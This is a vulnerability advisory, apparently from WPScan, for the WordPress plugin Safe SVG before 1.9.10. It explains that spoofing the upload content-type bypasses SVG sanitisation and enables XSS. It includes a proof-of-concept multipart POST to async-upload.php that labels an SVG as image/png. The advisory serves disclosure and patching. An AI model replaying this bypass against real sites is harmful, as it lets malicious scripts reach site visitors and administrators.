Lucene search

K
wpvulndbDavid HamannWPVDB-ID:4D12533E-BDB7-411F-BCDF-4C5046DB13F3
HistoryMar 25, 2022 - 12:00 a.m.

Safe SVG < 1.9.10 - SVG Sanitisation Bypass

2022-03-2500:00:00
David Hamann
wpscan.com
9
safe svg
sanitisation bypass
content spoofing
xss attacks
xml attacks
vulnerability
post request
plugin

EPSS

0.001

Percentile

36.7%

The sanitisation step of the plugin can be bypassed by spoofing the content-type in the POST request to upload a file. Exploiting this vulnerability, an attacker will be able to perform the kinds of attacks that this plugin should prevent (mainly XSS, but depending on further use of uploaded SVG files potentially other XML attacks).

PoC

POST /wp-admin/async-upload.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------27451310545300823063986174174 Content-Length: 947 Connection: close Cookie: [user with upload capability] -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name=“name” xss.svg -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name=“action” upload-attachment -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name=“_wpnonce” b281e72731 -----------------------------27451310545300823063986174174 Content-Disposition: form-data; name=“async-upload”; filename=“xss.svg” Content-Type: image/png -----------------------------27451310545300823063986174174–

EPSS

0.001

Percentile

36.7%

Related for WPVDB-ID:4D12533E-BDB7-411F-BCDF-4C5046DB13F3